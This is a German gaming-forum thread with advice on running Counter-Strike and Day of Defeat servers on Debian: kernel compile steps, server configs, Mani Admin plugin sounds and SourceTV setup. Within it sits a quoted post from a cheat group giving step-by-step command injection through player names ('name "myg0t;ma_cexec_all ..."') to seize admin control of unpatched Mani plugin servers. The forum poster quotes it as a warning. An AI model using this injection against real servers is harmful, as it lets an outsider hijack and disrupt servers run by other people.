also normal sollte es da keine Probleme geben
Hast du auch darauf geachtet das du die vorherige cfg kopiert hast und nicht mein beispiel -->2.6.15?
also normal sollte es da keine Probleme geben
Hast du auch darauf geachtet das du die vorherige cfg kopiert hast und nicht mein beispiel -->2.6.15?
so wurde aktualisiert er hat den pfad geändert
http://forum.pur3gaming.com/viewtopic.php?t=7
Hast du auch Debian?
mit der Eingabe "stats" in der Konsole kannst du die internen ServerFPS anschauen Sollten die unter 100 liegen ist das nicht gut.
Zudem CPUauslastung im Auge halten immber besser ein bissl mehr luft lassen als zu wenig.
Kernel --->jetzt wird gebackt
http://forum.pur3gaming.com/viewtopic.php?t=7
Server.cfg -->installations HowTo http://forum.pur3gaming.com/viewtopic.php?t=2
So zu diesem punkt cvarblock + mani sind gefährlich ....vor 3 Wochen habe ich im Mani Forum ein post gemacht Mani + cvarblock v5.0.2 waren zu der zeit hack bar... Durch verbreitung von dem Cheatclan mygot wurden da durch super viele server geshutet usw. Bei der version v5.0.2a wurde der bug halb gefixt und man konnte keine rcon Rechte mehr bekommen sondern nur noch durch Mani selbst verschiedene sachen ändern wie freezen oder Namen umändern. das Prob ist aber bereits gefixt und sollte keine Probleme mehr machen...
Auch Mani hatte sich nach wiederholtem anmailen und detailierten Anleitugnen endlich mal dazu bekannt es in seinem Forum zu posten http://www.mani-admin-plugin.c…ums/viewtopic.php?t=26343
Also besser informieren
[Exploit] CSP, Euroblock, ZBlock, and Cvarblock servers - Comments: (161)
posted by [myg0t]SourceX on Friday, April 21 @ 5:12 PM
We had originally authorized BaDazz to release this on the MPC forums, but since Diddle viewed it as potential legal trouble, we are posting it here instead. The details of our original post are as follows:
This has been a semi-private exploit for some time now, and since many servers have been putting fixes in place for it, we at myg0t have decided to release it to the general public.
The exploit takes place in the Mani-Admin plugin console, which works on all (but patched) CSP, Euroblock, ZBlock, and Cvarblock servers, and it enables you to more or less play admin on the server of choice. You may find a short MPEG encoded movie of the exploit being used here: http://www.myg0t.com/mani_exploit-myg0t.tar.gz
Follow these steps to test out this exploit:
Step 1. Start CS:S with or without hacks.. doesnt really matter.
Step 2. Open the console and use a command such as: name "myg0t;ma_cexec_all name [myg0t]"
Step 3. After that, connect to an IP of the server you want. (see below)
Step 4. Join a team and select your player model. The command will be executed when the new round starts.
So, at the start of the next round, all player names will be changed with [myg0t] and part of their SteamID.
For step two, you have many commands to choose from, here are some fun ones for an exmaple:
name "myg0t;ma_freeze #CT" < or #T for terror team.. or #ALL for all players. freeze ppl
name "myg0t;sv_gravity 1"
name "myg0t;sv_cheats 1"
name "myg0t;ma_blind #CT" < or #T for terror team.. or #ALL for all players. blinding ppl
name "myg0t;ma_timebomb #all" < or #T for terror team.. or #ALL for all players. make ppl a timebomb
name "myg0t;ma_cexec_all fps max 0.99"
You can use your imagination and do almost anything you'd like, turn VAC2 secure servers into insecure, enable wireframe, wallhacks, hitboxes and more.
To spam things like skulls and purple shit like in past CS:S beta exploits, first enable sv_cheats, and then use the following config file:
"te 1000 breakmodel"
"te 1000 Dynamic Light"
"te 1000 Explosion"
"te 1000 Large Funnel"
"te 1000 Show Line"
"te 1000 Blood Stream"
"te 1000 Metal Sparks"
"te 1000 Armor Ricochet"
"te 1000 BeamRingPoint"
"te 1000 Bubbles"
"te 1000 Sprite"
"te 1000 Energy Splash"
"te 1000 Smoke"
"te 1000 breakmodel"
"te 1000 Dynamic Light"
"te 1000 Explosion"
"te 1000 Large Funnel"
"te 1000 Show Line"
"te 1000 Blood Stream"
"te 1000 Metal Sparks"
"te 1000 Armor Ricochet"
"te 1000 BeamRingPoint"
"te 1000 Bubbles"
"te 1000 Sprite"
"te 1000 Energy Splash"
"te 1000 Smoke"
This exploit has been tested in CS:S and DoD:S. Credits go out to daad from our forums for finding this and sharing it with us.
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So Punkt 1
Ein RootServer ist zwar ne schöne Sache weil man darauf alles mögliche laufen lassen kann wie dein Webspace und Gameserver usw allerdings ist es nicht wirklich sehr ratsam alles zusammen laufen zu lassen.
So also solltest du mal alles unsinnige zum Test abschalten.
Nächster Punkt es kann sein das einige Plugins eventuell zum laggen führen darum solltest du erstmal keine Plugins wie z.B Mani usw installieren.
Als nächsten Punkt solltest du deinen Kernel optimieren, falls du das noch nicht gemacht hast. eine passende Anleitung habe ich hier schon verfasst ist allerdings nur für Debian http://forum.pur3gaming.com/viewtopic.php?t=7
Jetzt sollte man die Anbindung überprüfen das kannst du ganz einfach machen indem du deinen Server anpingst.Bevor du allerdings los legst schliesse alle unötigen Anwendungen wie z.B ICQ Emule usw. Zum Test Mit Windows geht das ganz einfach Start -->Ausführen-->cmd-->ping DEINESERVERIP -t
Enter
nun lässt du eine weile den Server anpingen wenn er konstante pingzeiten liefert sollte es daran schonmal nicht liegen.
mit strg + c beendest due den ping Vorgang
So sollte nun alles positiv laufen kannst du den Server mal starten und eine passende CFG laden auch die habe ich in meinem Tutorial hier http://forum.pur3gaming.com/viewtopic.php?t=2 zum downlod zur Verfügung gestellt.
Wenn es jetzt immer noch laggen sollte bin ich ehrlich gesagt überfragt... Vieleicht liegt es dann an dir...
naja du brauchst dann wohl auch copy und paste Anleitungen
hab schon einige Fertig in Sachen Debian und GameServer
-->http://forum.pur3gaming.com/
Wenn du mit irgendwas nicht klar kommst schreibs einfach ich sag dir dann wie es geht...
So also Nr1 Leute die rum ruckeln die gibts immer... etwa scheiss Anbindung vom User oder vom Server selbst. Da machst du am besten per Plugin nen HPKK rein auf max 100ms
Nr2 Warum nutzt du ein 64bit Linux. Das neue Vac läuft nur mit 32bit.
Nr3 Setz die ticrate als Startparameter z.B wie hier gezeigt http://forum.pur3gaming.com/viewtopic.php?t=3
So als letztes poste ich mal meine alte CS1.6 server.cfg da ich keinen 1.6 Server mehr habe.
hostname "[*pur3] #1 - 24/7aim_ak-coltD2 - [tick100][pur3gaming.com]"
rcon_password "**********"
mapcyclefile "mapcycle.txt"
mp_autokick 0
mp_autoteambalance 0
mp_c4timer 35
mp_buytime 1.5
mp_flashlight 1
mp_footsteps 1
mp_freezetime 0
mp_friendlyfire 1
mp_hostagepenalty 5
mp_limitteams 0
mp_roundtime 9
mp_timelimit 0
mp_tkpunish 0
mp_forcechasecam 2
mp_forcecamera 0
mp_friendly_grenade_damage 1
mp_fadetoblack 0
mp_chattime 5
mp_falldamage 1
mp_startmoney 16000
mp_ghostfrequency 0.1
mp_lowlag 1
sv_aim 0
sv_cheats 0
sv_restartround 0
sv_minrate 2500
sv_maxrate 25000
//sv_password "****"
sv_maxspeed 320
sv_airaccelerate 2
sv_airmove 0
sv_voiceenable 1
sv_alltalk 1
sv_unlag 1
sv_visiblemaxplayers 18
sv_sendvelocity 0
max_shells 0
max_smokepuffs 0
fakelag 0
fakeloss 0
hpk_maxsize 0.5
decalfrequency 60
pausable 0
allow_spectators 0
mapchangecfgfile server.cfg
servercfgfile server.cfg
log off
exec banned.cfg
log on
mp_logfile 1
mp_logmessages 1
Ich ahbe für so was die Software von http://www.sharedbans.com/ und einen SourceTV Server. Wenn du also feststellst das jemand cheatet mach ne Demo davon und schick es an sharedbans.com und dann kommt der cheater auf die Liste.
da bin ich mal gespannt hehe
hehe ne ich wollte ja nicht den kernel hier benchmarken hehe nach mehreren Aussagen aus anderen Foren soll der Patch nicht schlecht sein und darum hab ich ihn mal ausprobiert und es läuf alles sauber im vergleich zum vorherigen 100hz kernel der zu der Zeit drauf war.
joar konnte mich bisher nicht beschweren die Server laufen gut bzw im mom nur noch der CSS da CoD2 ja leider keinen anständigen Linuxserverpatch mitgebracht hat...grml
guckst du hier http://members.optusnet.com.au/ckolivas/kernel/
allerdings ahb ich gerade gesehen das es eine neue version davon gibt werd ich gleich ändern
naja das Betriebssystem ansich ist egal ich bin zwar auch eher für Debian aber das ist Geschmackssache.
am wichtigsten ist der Kernel. Ein 100HZ Kernel ist nicht gerade Gameserver tauglich besonders nicht wenn mehrere Gameserver drauf laufen sollen.
Das 2te wäre dann das Routing/Anbindung selbt das beste System bringt keinen guten Gameserver zustande wenn die Anbindung schlecht ist.
Die Kernel Problematik kannst du aber so lösen:
su
apt-get install libc6-dev gcc binutils modutils kernel-package libncurses5-dev debianutils make
cd /..
cd /usr/src/
wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.16.tar.bz2
tar xfvj linux-2.6.16.tar.bz2
wget http://ck.kolivas.org/patches/cks/patch-2.6.16-cks8.bz2
mv linux-2.6.16 linux-2.6.16-cks8
cd linux-2.6.16-cks8
bzcat /usr/src/patch-2.6.16-cks8.bz2 | patch -p1
cd /..
cd /usr/src/
ln -s linux-2.6.16-cks8 linux
Alles anzeigen
So nun übernehmen wir die alte Kernelcfg. Durch den Befehl "ls /boot" siehste du die cfg oder cfgs der vorherigen Kernel. Die musst du natürlich
bei "cp /boot/config-2.6.15" auf deine vorherige cfg abändern.
Mit dem folgenden Befehl wird nun ein Menü angezeigt dort solltest du
1000HZ und preemption lowlatency Desktop aktivieren
make menuconfig
make-kpkg clean
make-kpkg kernel_image --revision=Kernel.01
ls /usr/src/
cd /..
cd /usr/src/
dpkg -i kernel-image-2.6.16-cks8_Kernel.01_i386.deb
So die Anleitung ist nun für Debian in wie fern die sich von Suse unterscheidet hab ich keine Ahnung... habe bisher noch nie Suse benutzt.
So nun zur cfg...
Ich habe mir folgende cfg genommen
Meine Sourceserver laufen auch mit tick100
Startparameter:
screen -A -m -d -S CSS01 ./srcds_run -game cstrike +map de_dust2 -maxplayers 18 +port 27015 +ip DEINEIP -tickrate 100 -autoupdate
also ich ahbe auch einen DoD Server und bei mir läuft das auch mit den 1000fps
Wichtig ist das du einen 1000HZ Kernel hast wirkt sich für GameServer sehr positiv aus.
Startzeile:
screen -A -m -d -S DOD01 ./hlds_run -pingboost 3 -game dod +maxplayers 22 +map dod_avalanche +ip 85.93.20.5 +port 27018 -secure +sys_ticrate 10000 -autoupdate
Server.cfg
//-----------------------------------------------
// Server Config For Day Of Defeat v1.0 Server
//-----------------------------------------------
hostname "[*pur3] #03 - 24/7dod_avalanche - [http://www.pur3gaming.com]"
sv_password ""
sv_region 3
//sv_spectator_password ""
rcon_password "********"
//-----------------------------------------------
// Server Variables
//-----------------------------------------------
mp_autocrosshair 0
mp_flashlight 1
//mp_teamplay 11
mp_friendlyfire 1
mp_fraglimit 0
mp_timelimit 240
mp_ghostfrequency 0.1
mp_lowlag 1
sv_downloadurl "http://www.meinfastdownload.de"
sv_allowdownload 1
sv_allowupload 1
sv_cheats 0
sv_secure 1
sv_maxspectators 0
sv_maxrate 25000
sv_minrate 3500
sv_sendvelocity 0
decalfrequency 60
fakelag 0
fakeloss 0
pausable 0
//-----------------------------------------------
// Physics settings
//-----------------------------------------------
sv_accelerate 10
sv_aim 0
sv_airaccelerate 2
sv_airmove 0
sv_alltalk 0
sv_friction 4
sv_gravity 800
sv_bounce 1
sv_clienttrace 3.5
sv_clipmode 0
sv_stepsize 18
sv_stopspeed 100
sv_maxspeed 500
sv_wateraccelerate 10
sv_waterfriction 1
edgefriction 2
mp_falldamage 1
mp_footsteps 1
max_shells 0
max_smokepuffs 0
//-----------------------------------------------
// DoD Extra settings
//-----------------------------------------------
//This Enables DoD's Netcoding
sv_unlag 1
//DoD Beta 2.0 Bullet Tracer settings
traceroffset 100
tracerlength 0.45
tracerred 1.3
tracerblue 0.1
tracergreen 0.7
traceralpha 0.45
tracerspeed 6250
//AMX AFK
mp_afktime 300
mp_afkminplayers 8
//Turn on\off Spectating Team
mp_allowspectators 0
//Turn on/off death messages
mp_deathmsg 1
// load ban files
exec banned.cfg
exec listip.cfg
exec autoexec.cfg
Das ist ganz einfach zuerst lädst du dir ManiAdminPlugin hier http://www.mani-admin-plugin.c…ums/viewtopic.php?t=24407 herunter.
Dann lädst du dir das Quakesoundpack herunter http://www.mani-admin-plugin.c…quake_pack/quake_pack.zip
Dann ladest du dir die dateien wie sie in dem archiv sind auf deinen gameserver! d.h. alle dateien die sich im archiv im ordner cfg gehören müssen auch in den ordner cfg auf deinem server!
Dann noch ein paar Configs bearbeiten:
autoexec.cfg:
exec mani_quake_sounds.cfg
mani_quake_sounds.cfg:
mani_quake_sounds 1
mani_player_settings_quake 1
mani_quake_auto_download 1
dann solltet ihr noch die mani_player_settings.dat (cfg/mani_admin_plugin) löschen und den server restarten
so headshot/multikill usw sollten jetzt gehen
Jetzt zu den say sounds
das amchst du so
say sounds mit chat anzeige
erstmal müssen alle sounds in die soundlist.txt eingetragen sein. das sieht wie folgt aus ein beispiel das musst du natürlich deine sounds anpassen
"hi" admin_plugin/hi.mp3
usw.
nun kann man mit dem befehl
@ma_play 1 oder
@ma_play hi oder in die console
ma_play 1/hi
den sound hi abspielen
um es so zu machen das man im chat nur hi schreiben muss muss man die commandlist.txt bearbeiten dort fügst du folgendes ein
"hi" C ma_play hi
nun wird nur der sound abgespielt will man nun auch noch dazu haben das der jenige es im chat schreibt also das dann da im chat Player: hi steht muss man folgendes in die commandlist.txt schreiben
"hi" C ma_play hi; say öhi
WICHTIG!!! Das ö muss vor dem hi stehen beim say commands es wird nachher aber nur hi angezeigt ansonsten wenn man es weg lässt hat man eine schleife und bei der aktivierung durch hi wird der sound immer abgespielt.
Also ich kann weder Webperoni, Server4you, 1u1 noch Hetzner usw empfehlen... Diese Anbieter sind Hauptsächlich für Webhosting usw angelegt.
Was soviel heisst wie nicht konstante/hohe Pings...Wer damit natürlich zufrieden ist der kann sich gerne so ein Teil zu den billigen Preisen zulegen.
Sollte man aber Qualität voraussetzen so muss man sich vorher über eine GameServerfähige Anbindung gedanken machen. Solche Anbindungen sind natürlich etwas Teurer. Aber man erspart sich nachher die Enttäuschung wenn man vor leeren GameServern steht und trotzdem Geld investieren muss.
Meine Empfehlung etwa gleich zu einem GameServeranbieter wie z.B ylabs, clanserver4u, esport-servers usw....
oder wenn man doch einen Rootserver haben will zu
http://www.digitallabs.de
http://www.steins-steins.de
beide Hoster bieten ein relativ gutes Preis/Leistungsverhältnis an. Wenn ihr testen wollt könnt ihr unten bei meiner Signatur die GameServer reinklicken.
naja das Putty nicht funktioniert das kann ich mir fast nicht vorstellen... Da WinSCP im grunde darauf aufbaut.
Wenn ich das nun richtig verstanden habe bricht die Verbindung zum Server ab...
Du hast folgendes Problem wenn die Installation länger dauert verliert/unterbricht Putty die Verbindung. Da die Installation nicht in einem Screen läuft wird die Installation abgebrochen. Da du den SSH Zugang ja schliesst.
Da gibts nun folgende Möglichkeiten
Nr1: Du lässt die Installation in einem Screen laufen das geht so
Falls du Screen noch nicht installiert hast kannst du das mit dem obrigen Befehl machen (Nur bei Debian)
screen -A -m -d -S test
screen -r test
./hldsupdatetool.bin
./steam -command update -game cstrike -dir /home/DeinGameServerVerzeichnis
Nr2: Du setzt unter der Kategorie "Connection"
"Sending between Keepalives" auf 10
Das ist ganz einfach du erstellst eine txt Datei und nennst sie "sourcetv.cfg"
dann schreibst du folgendes dort rein
tv_enable 1 // Source TV. (1=an 0=aus)
tv_port 27019 // Port deines SrcTV Clienten.
tv_autorecord 0 // Nimmt automatisch ALLE Spiele als SrcTV demos auf.
tv_debug 0 // SrcTV debug info.
tv_delay 60 // SrcTV verzoegerung zum Livespiel in Sekunden.
tv_dispatchmode 1 // ??? Dispatch clients to relay proxies: 0=never, 1=if appropriate, 2=always
tv_maxclients 100 // Maximale Zuschaueranzahl auf deinem SrcTV Server.
tv_maxrate 3500 // Maximale Bandbreite die fuer den SrcTV freigegeben werden. 0 = unlimitiert
tv_name "SourceTV" // Name deines SrcTV Servers
tv_overrideroot 0 // Ueberschreibt die SrcTV master root Adresse.
tv_password "" // SrcTV Passwort fuer alle Zuschauer ( "" = Aus)
tv_relaypassword "" // SrcTV relaypassword fuer alle Zuschauer ( "" = Aus)
tv_snapshotrate 20 // Schreibt alle "xx" Serverticks einen Schritt in die Demo. (Nur waehrend SrcTV Demoaufnahmen.)
wenn du das erledigt hast speicherst du die Datei ab und schreibst in die "autoexec.cfg"
exec sourcetv.cfg
fertig nach einem neustart sollte das Teil laufen...
Naja also ich habe auch einen AMD64 3800+ X2 und Debian Sarge 32bit ich baue auf diesen kernel hier...
Linux root26 2.6.15-cks4 #1 SMP PREEMPT Mon Feb 20 21:36:40 CET 2006 i686 GNU/Linux
Jeder macht seinen Kernel anders...
Ich mach das so
su
apt-get install libc6-dev gcc binutils modutils kernel-package libncurses5-dev debianutils make
cd /..
cd /usr/src/
wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.16.tar.bz2
tar xfvj linux-2.6.16.tar.bz2
wget http://ck.kolivas.org/patches/cks/patch-2.6.16-cks2.bz2
mv linux-2.6.16 linux-2.6.16-cks2
cd linux-2.6.16-cks2
bzcat /usr/src/patch-2.6.16-cks2.bz2 | patch -p1
cd /..
cd /usr/src/
ln -s linux-2.6.16-cks2 linux
ls /boot/
cp /boot/config-2.6.15-cks4 linux/.config
Alles anzeigen
Dort musst du natürlich deine alte Kernelcfg auswählen deshalb das "ls /boot/"
Ich baue auf:
--->1000HZ<---
--->PreemptionKernel (Low Latency Desktop)<----
damit habe ich die besten Erfahrungen gemacht.
make-kpkg clean
make-kpkg kernel_image --revision=Kernel.01
ls /usr/src/
cd /..
cd /usr/src/
dpkg -i kernel-image-2.6.16-cks2_Kernel.01_i386.deb
fertig...